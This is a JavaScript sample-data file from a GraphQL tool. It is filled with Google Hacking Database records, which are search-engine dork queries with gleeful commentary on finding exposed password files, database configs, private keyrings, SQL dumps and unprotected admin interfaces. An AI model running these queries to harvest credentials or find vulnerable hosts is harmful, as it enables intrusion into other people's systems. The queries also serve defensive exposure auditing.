graphql-engine/community/tools/json2graphql/example-datasets/random.js

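// Example dataset: entries from the Google Hacking Database (GHDB), taken from https://github.com/0xBEAF/GHDB-in-json
// Each record has the keys "short description", "long description", "submited" (spelled this way in the data), "request" and "id".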
const db = {
"data": [{"short description": "squid cache server reports", "long description": "These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing.", "submited": "2003-06-24", "request": "\"cacheserverreport for\" \"This analysis was produced by calamaris\"", "id": 1}, {"short description": "Ganglia Cluster Reports", "long description": "These are server cluster reports, great for info gathering. Lesse, what were those server names again?", "submited": "2003-06-24", "request": "intitle:\"Ganglia\" \"Cluster Report for\"", "id": 2}, {"short description": "ICQ chat logs, please...", "long description": "ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their entire ICQ directories online. On purpose?", "submited": "2003-06-24", "request": "intitle:\"Index of\" dbconvert.exe chats", "id": 3}, {"short description": "Apache online documentation", "long description": "When you install the Apache web server, you get a nice set of online documentation. 
When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?", "submited": "2003-06-24", "request": "intitle:\"Apache HTTP Server\" intitle:\"documentation\"", "id": 4}, {"short description": "Coldfusion Error Pages", "long description": "These aren't too horribly bad, but there are SO MANY of them. These sites got googlebotted while the site was having \"technical difficulties.\" The resulting cached error message gives lots of juicy tidbits about the target site.", "submited": "2003-06-24", "request": "\"Error Diagnostic Information\" intitle:\"Error Occurred While\"", "id": 5}, {"short description": "Financial spreadsheets: finance.xls", "long description": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\"", "submited": "2003-06-24", "request": "intitle:\"Index of\" finance.xls", "id": 6}, {"short description": "Financial spreadsheets: finances.xls", "long description": "\"Hey! I have a great idea! Let's put our finances on our website in a secret directory so we can get to it whenever we need to!\"", "submited": "2003-06-24", "request": "intitle:index.of finances.xls", "id": 7}, {"short description": "sQL data dumps", "long description": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper.....", "submited": "2003-06-24", "request": "\"# Dumping data for table\"", "id": 8}, {"short description": "bash_history files", "long description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... 
*sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...", "submited": "2003-06-24", "request": "intitle:index.of .bash_history", "id": 9}, {"short description": "sh_history files", "long description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations...", "submited": "2003-06-24", "request": "intitle:index.of .sh_history", "id": 10}, {"short description": "mysql history files", "long description": "The .mysql_history file contains commands that were performed against a mysql database. A \"history\" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS...", "submited": "2003-06-24", "request": "intitle:\"Index of\" .mysql_history", "id": 11}, {"short description": "mt-db-pass.cgi files", "long description": "These folks had the technical prowess to unpack the movable type files, but couldn't manage to set up their web servers properly. Check the mt.cfg files for interesting stuffs...", "submited": "2003-06-24", "request": "intitle:index.of mt-db-pass.cgi", "id": 12}, {"short description": "Windows 2000 Internet Services", "long description": "At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. 
This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: \"Any users attempting to connect to this site are currently receiving an 'Under Construction page'\" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature...", "submited": "2003-06-24", "request": "intitle:\"Welcome to Windows 2000 Internet Services\"", "id": 13}, {"short description": "IIS 4.0", "long description": "Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of \"Welcome to IIS 4.0\" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award.", "submited": "2003-06-24", "request": "intitle:\"Welcome to IIS 4.0\"", "id": 14}, {"short description": "Look in my backup directories! 
Please?", "long description": "Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for \"best security practices,\" winning this site the Top GoogleDork award for this category.", "submited": "2003-06-24", "request": "\"Index of /backup\"", "id": 15}, {"short description": "OpenBSD running Apache", "long description": "I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h..", "submited": "2003-06-24", "request": "\"powered by openbsd\" +\"powered by apache\"", "id": 16}, {"short description": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "long description": "PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. 
GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude.", "submited": "2003-06-24", "request": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "id": 17}, {"short description": "people.lst", "long description": "*sigh*", "submited": "2003-06-24", "request": "intitle:index.of people.lst", "id": 18}, {"short description": "passwd", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:index.of passwd passwd.bak", "id": 19}, {"short description": "master.passwd", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"master.passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory...", "submited": "2003-06-24", "request": "intitle:index.of master.passwd", "id": 20}, {"short description": "pwd.db", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. 
The his in this search show \"pwd.db\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of\" pwd.db", "id": 21}, {"short description": "htpasswd / htpasswd.bak", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of\" \".htpasswd\" htpasswd.bak", "id": 22}, {"short description": "htpasswd / htgroup", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit...", "submited": "2003-06-24", "request": "intitle:\"Index of\" \".htpasswd\" \"htgroup\" -intitle:\"dist\" -apache -htpasswd.c", "id": 23}, {"short description": "spwd.db / passwd", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! 
Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of\" spwd.db passwd -pam.conf", "id": 24}, {"short description": "passwd / etc (reliable)", "long description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!", "submited": "2003-06-24", "request": "intitle:\"Index of..etc\" passwd", "id": 25}, {"short description": "AIM buddy lists", "long description": "These searches bring up common names for AOL Instant Messenger \"buddylists\". These lists contain screen names of your \"online buddies\" in Instant Messenger. Not that's not too terribly exciting or stupid unless you want to mess with someone's mind, and besides, some people make these public on purpose. The thing that's interesting are the files that get stored ALONG WITH buddylists. Often this stuff includes downloaded pictures, resumes, all sorts of things. This is really for the peepers out there, and it' possible to spend countless hours rifling through people's personal crap. Also try buddylist.blt, buddy.blt, buddies.blt.", "submited": "2003-06-24", "request": "buddylist.blt", "id": 26}, {"short description": "config.php", "long description": "This search brings up sites with \"config.php\" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!", "submited": "2003-06-24", "request": "intitle:index.of config.php", "id": 27}, {"short description": "phpinfo()", "long description": "this brings up sites with phpinfo(). There is SO much cool stuff in here that you just have to check one out for yourself! 
I mean full blown system versioning, SSL version, sendmail version and path, ftp, LDAP, SQL info, Apache mods, Apache env vars, *sigh* the list goes on and on! Thanks \"joe!\" =)", "submited": "2004-11-18", "request": "intitle:phpinfo \"PHP Version\"", "id": 28}, {"short description": "MYSQL error message: supplied argument....", "long description": "One of many potential error messages that spew interesting information. The results of this message give you real path names inside the webserver as well as more php scripts for potential \"crawling\" activities.", "submited": "2003-06-24", "request": "\"supplied argument is not a valid MySQL result resource\"", "id": 29}, {"short description": "The Master List", "long description": "CLick on any of the following links to show google's list!_vti_inf.html (694 hits)service.pwd (11,800 hits)users.pwd (23 hits)authors.pwd (22 hits)administrators.pwd (22 hits)shtml.dll (780 hits)shtml.exe (761 hits)fpcount.exe (1,370 hits)default.asp (2,170 hits)showcode.asp (4 hits)sendmail.cfm (5 hits)getFile.cfm (7 hits)imagemap.exe (510 hits)test.bat (353 hits)msadcs.dll (8 hits)htimage.exe (513 hits)counter.exe (164 hits)browser.inc (11 hits)hello.bat (18 hits)default.asp\\\\ (2,170 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)dvwssr.dll (571 hits)cart32.exe (9 hits)add.exe (38 hits)index.JSP (998 hits)index.jsp (998 hits)SessionServlet (46 hits)shtml.dll (780 hits)index.cfm (473 hits)page.cfm (5 hits)shtml.exe (761 hits)web_store.cgi (16 hits)shop.cgi (63 hits)upload.asp (27 hits)default.asp (2,170 hits)pbserver.dll (6 hits)phf (370 hits)test-cgi (1,560 hits)finger (23,900 hits)Count.cgi (8,710 hits)jj (5,600 hits)php.cgi (170 hits)php (48,000 hits)nph-test-cgi (132 hits)handler (9,220 hits)webdist.cgi (35 hits)webgais (37 hits)websendmail (12 hits)faxsurvey (27 hits)htmlscript (50 hits)perl.exe (340 hits)wwwboard.pl (455 hits)www-sql (26,500 hits)view-source (641 hits)campas (94 hits)aglimpse (12 hits)glimpse (4,530 hits)man.sh 
(127 hits)AT-admin.cgi (789 hits)AT-generate.cgi (14 hits)filemail.pl (5 hits)maillist.pl (16 hits)info2www (737 hits)files.pl (267 hits)bnbform.cgi (91 hits)survey.cgi (93 hits)classifieds.cgi (25 hits)wrap (14,000 hits)cgiwrap (1,270 hits)edit.pl (114 hits)perl (80,700 hits)names.nsf (12 hits)webgais (37 hits)dumpenv.pl (7 hits)test.cgi (1,560 hits)submit.cgi (79 hits)submit.cgi (79 hits)guestbook.cgi (528 hits)guestbook.pl (451 hits)cachemgr.cgi (25 hits)responder.cgi (4 hits)perlshop.cgi (30 hits)query (15,500 hits)w3-msql (877 hits)plusmail (12 hits)htsearch (177 hits)infosrch.cgi (19 hits)publisher (2,610 hits)ultraboard.cgi (24 hits)db.cgi (96 hits)formmail.cgi (420 hits)allmanage.pl (5 hits)ssi (9,550 hits)adpassword.txt (39 hits)redirect.cgi (60 hits)f (124,000 hits)cvsweb.cgi (78 hits)login.jsp (241 hits)login.jsp (241 hits)dbconnect.inc (18 hits)admin (57,000 hits)htgrep (30 hits)wais.pl (133 hits)amadmin.pl (14 hits)subscribe.pl (65 hits)news.cgi (387 hits)auctionweaver.pl (2 hits).htpasswd (2,390 hits)acid_main.php (3 hits)access_log (1,250 hits)access-log (618 hits)access.log (618 hits)log.htm (386 hits)log.html (1,310 hits)log.txt (987 hits)logfile (23,200 hits)logfile.htm (76 hits)logfile.html (671 hits)logfile.txt (701 hits)logger.html (37 hits)stat.htm (398 hits)stats.htm (687 hits)stats.html (1,840 hits)stats.txt (342 hits)webaccess.htm (11 hits)wwwstats.html (80 hits)source.asp (11 hits)perl (80,700 hits)mailto.cgi (46 hits)YaBB.pl (35 hits)mailform.pl (670 hits)cached_feed.cgi (6 hits)cr (27,500 hits)global.cgi (14 hits)Search.pl (548 hits)build.cgi (74 hits)common.php (184 hits)common.php (184 hits)show (33,500 hits)global.inc (114 hits)ad.cgi (21 hits)WSFTP.LOG (11 hits)index.html~ (81,100 hits)index.php~ (6,740 hits)index.html.bak (690 hits)index.php.bak (69 hits)print.cgi (61 hits)register.cgi (172 hits)webdriver (35 hits)bbs_forum.cgi (45 hits)mysql.class (21 hits)sendmail.inc (97 hits)CrazyWWWBoard.cgi (68 hits)search.pl (548 
hits)way-board.cgi (44 hits)webpage.cgi (89 hits)pwd.dat (22 hits)adcycle (12 hits)post-query (240 hits)help.cgi (69 hits)", "submited": "2003-06-24", "request": "", "id": 30}, {"short description": "robots.txt", "long description": "The robots.txt file contains \"rules\" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff.However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!", "submited": "2003-06-27", "request": "intitle:index.of robots.txt", "id": 31}, {"short description": "passlist", "long description": "I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage", "submited": "2003-06-27", "request": "index.of passlist", "id": 32}, {"short description": "secret", "long description": "What kinds of goodies lurk in directories marked as \"secret?\" Find out...", "submited": "2003-06-27", "request": "index.of.secret", "id": 33}, {"short description": "private", "long description": "What kinds of things might you find in directories marked \"private?\" let's find out....", "submited": "2003-06-27", "request": "index.of.private", "id": 34}, {"short description": "etc (index.of)", "long description": "This search gets you access to the etc directory, where many many many types of password files can be found. 
This link is not as reliable, but crawling etc directories can be really fun!", "submited": "2003-06-27", "request": "index.of.etc", "id": 35}, {"short description": "winnt", "long description": "The \\WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination.", "submited": "2003-06-27", "request": "index.of.winnt", "id": 36}, {"short description": "secure", "long description": "What could be hiding in directories marked as \"secure?\" let's find out...", "submited": "2003-06-27", "request": "index.of.secure", "id": 37}, {"short description": "protected", "long description": "What could be in a directory marked as \"protected?\" Let's find out...", "submited": "2003-06-27", "request": "index.of.protected", "id": 38}, {"short description": "index.of.password", "long description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...", "submited": "2003-06-27", "request": "index.of.password", "id": 39}, {"short description": "\"This report was generated by WebLog\"", "long description": "These are weblog-generated statistics for web sites... A roadmap of files, referrers, errors, statistics... yummy... a schmorgasbord! =P", "submited": "2003-06-27", "request": "\"This report was generated by WebLog\"", "id": 40}, {"short description": "\"produced by getstats\"", "long description": "Another web statistics package. 
This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!", "submited": "2003-06-30", "request": "\"These statistics were produced by getstats\"", "id": 41}, {"short description": "\"generated by wwwstat\"", "long description": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots os good stuff.You know, these are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)", "submited": "2003-06-30", "request": "\"This summary was generated by wwwstat\"", "id": 42}, {"short description": "haccess.ctl (one way)", "long description": "this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find.", "submited": "2003-06-30", "request": "intitle:index.of haccess.ctl", "id": 43}, {"short description": "haccess.ctl (VERY reliable)", "long description": "haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file.", "submited": "2003-06-30", "request": "filetype:ctl Basic", "id": 44}, {"short description": "filetype:xls username password email", "long description": "This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank \"template\" forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. 
depending on your perspective.", "submited": "2003-06-30", "request": "filetype:xls username password email", "id": 45}, {"short description": "Hassan Consulting's Shopping Cart Version 1.18", "long description": "These servers can be messed with in many ways. One specific way is by way of the \"../\" bug. This lets you cruise around the web server in a somewhat limited fashion.", "submited": "2003-07-08", "request": "inurl:shop \"Hassan Consulting's Shopping Cart Version 1.18\"", "id": 46}, {"short description": "site:edu admin grades", "long description": "I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!", "submited": "2003-07-10", "request": "site:edu admin grades", "id": 47}, {"short description": "auth_user_file.txt", "long description": "DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)", "submited": "2003-07-11", "request": "allinurl:auth_user_file.txt", "id": 48}, {"short description": "inurl:config.php dbuname dbpass", "long description": "The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!", "submited": "2003-07-29", "request": "inurl:config.php dbuname dbpass", "id": 49}, {"short description": "inurl:tech-support inurl:show Cisco", "long description": "This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. 
Also, there are very few results (2 at the time of posting.)", "submited": "2003-08-07", "request": "inurl:tech-support inurl:show Cisco", "id": 50}, {"short description": "index_i.shtml Ready (Xerox printers on the web!)", "long description": "These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the \"password.shtml\" page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)", "submited": "2003-08-11", "request": "i_index.shtml Ready", "id": 51}, {"short description": "aboutprinter.shtml (More Xerox printers on the web!)", "long description": "More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not.", "submited": "2003-08-11", "request": "aboutprinter.shtml", "id": 52}, {"short description": "\"Chatologica MetaSearch\" \"stack tracking\"", "long description": "There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda...", "submited": "2003-08-15", "request": "\"Chatologica MetaSearch\" \"stack tracking:\"", "id": 53}, {"short description": "mystuff.xml - Trillian data files", "long description": "This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!", "submited": "2003-08-19", "request": "intitle:index.of mystuff.xml", "id": 54}, {"short description": "trillian.ini", "long description": "Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. 
The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!", "submited": "2003-08-19", "request": "intitle:index.of trillian.ini", "id": 55}, {"short description": "intitle:admin intitle:login", "long description": "Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke.", "submited": "2003-09-09", "request": "intitle:admin intitle:login", "id": 56}, {"short description": "ORA-00921: unexpected end of SQL command", "long description": "Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.", "submited": "2004-01-09", "request": "\"ORA-00921: unexpected end of SQL command\"", "id": 57}, {"short description": "passlist.txt (a better way)", "long description": "Cleartext passwords. No decryption required!", "submited": "2004-01-23", "request": "inurl:passlist.txt", "id": 58}, {"short description": "sitebuildercontent", "long description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?", "submited": "2004-03-04", "request": "inurl:sitebuildercontent", "id": 59}, {"short description": "sitebuilderfiles", "long description": "This is a default directory for the sitebuilder web design software program. 
If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?", "submited": "2004-03-04", "request": "inurl:sitebuilderfiles", "id": 60}, {"short description": "sitebuilderpictures", "long description": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?", "submited": "2004-03-04", "request": "inurl:sitebuilderpictures", "id": 61}, {"short description": "htpasswd", "long description": "This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*", "submited": "2004-03-04", "request": "filetype:htpasswd htpasswd", "id": 62}, {"short description": "\"YaBB SE Dev Team\"", "long description": "Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.", "submited": "2004-03-04", "request": "\"YaBB SE Dev Team\"", "id": 63}, {"short description": "EarlyImpact Productcart", "long description": "The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. 
Also see http://www.securityfocus.com/bid/9677 for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.", "submited": "2004-03-04", "request": "inurl:custva.asp", "id": 64}, {"short description": "mnGoSearch vulnerability", "long description": "According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allows an attacker to execute commands on the server.", "submited": "2004-03-04", "request": "\"Powered by mnoGoSearch - free web search engine software\"", "id": 65}, {"short description": "IIS 4.0 error messages", "long description": "IIS 4.0 servers. Extremely old, incredibly easy to hack...", "submited": "2004-03-04", "request": "intitle:\"the page cannot be found\" inetmgr", "id": 66}, {"short description": "Windows 2000 web server error messages", "long description": "Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box...", "submited": "2004-03-04", "request": "intitle:\"the page cannot be found\" \"2004 microsoft corporation\"", "id": 67}, {"short description": "IIS web server error messages", "long description": "This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into...", "submited": "2004-03-04", "request": "intitle:\"the page cannot be found\" \"internet information services\"", "id": 68}, {"short description": "phpMyAdmin dumps", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. 
They contain all SORTS of sensitive information...", "submited": "2004-03-04", "request": "\"# phpMyAdmin MySQL-Dump\" filetype:txt", "id": 69}, {"short description": "phpMyAdmin dumps", "long description": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information...", "submited": "2004-03-04", "request": "\"# phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"", "id": 70}, {"short description": "Gallery in configuration mode", "long description": "Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!", "submited": "2004-03-04", "request": "intitle:\"Gallery in Configuration mode\"", "id": 71}, {"short description": "cgiirc.conf", "long description": "CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!", "submited": "2004-03-04", "request": "intitle:index.of cgiirc.config", "id": 72}, {"short description": "cgiirc.conf", "long description": "This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. 
This file is for CGIIRC, not Google surfers!", "submited": "2004-03-04", "request": "inurl:cgiirc.config", "id": 73}, {"short description": "ipsec.secrets", "long description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!", "submited": "2004-03-04", "request": "inurl:ipsec.secrets -history -bugs", "id": 74}, {"short description": "ipsec.secrets", "long description": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!", "submited": "2004-03-04", "request": "inurl:ipsec.secrets \"holds shared secrets\"", "id": 75}, {"short description": "ipsec.conf", "long description": "The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting....", "submited": "2004-03-04", "request": "inurl:ipsec.conf -intitle:manpage", "id": 76}, {"short description": "Internal Server Error", "long description": "This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted.", "submited": "2004-03-04", "request": "intitle:\"500 Internal Server Error\" \"server at\"", "id": 77}, {"short description": "mysql error with query", "long description": "Another error message, this appears when an SQL query bails. 
This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message...", "submited": "2004-03-04", "request": "\"mySQL error with query\"", "id": 78}, {"short description": "sQL syntax error", "long description": "Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"You have an error in your SQL syntax near\"", "id": 79}, {"short description": "\"Supplied argument is not a valid MySQL result resource\"", "long description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"Supplied argument is not a valid MySQL result resource\"", "id": 80}, {"short description": "ORA-00936: missing expression", "long description": "A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"ORA-00936: missing expression\"", "id": 81}, {"short description": "ORA-00921: unexpected end of SQL command", "long description": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"ORA-00921: unexpected end of SQL command\"", "id": 82}, {"short description": "\"ORA-00933: SQL command not properly ended\"", "long description": "An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers...", "submited": "2004-03-04", "request": "\"ORA-00933: SQL command not properly ended\"", "id": 83}, {"short description": "\"Unclosed quotation mark before the character string\"", "long description": 
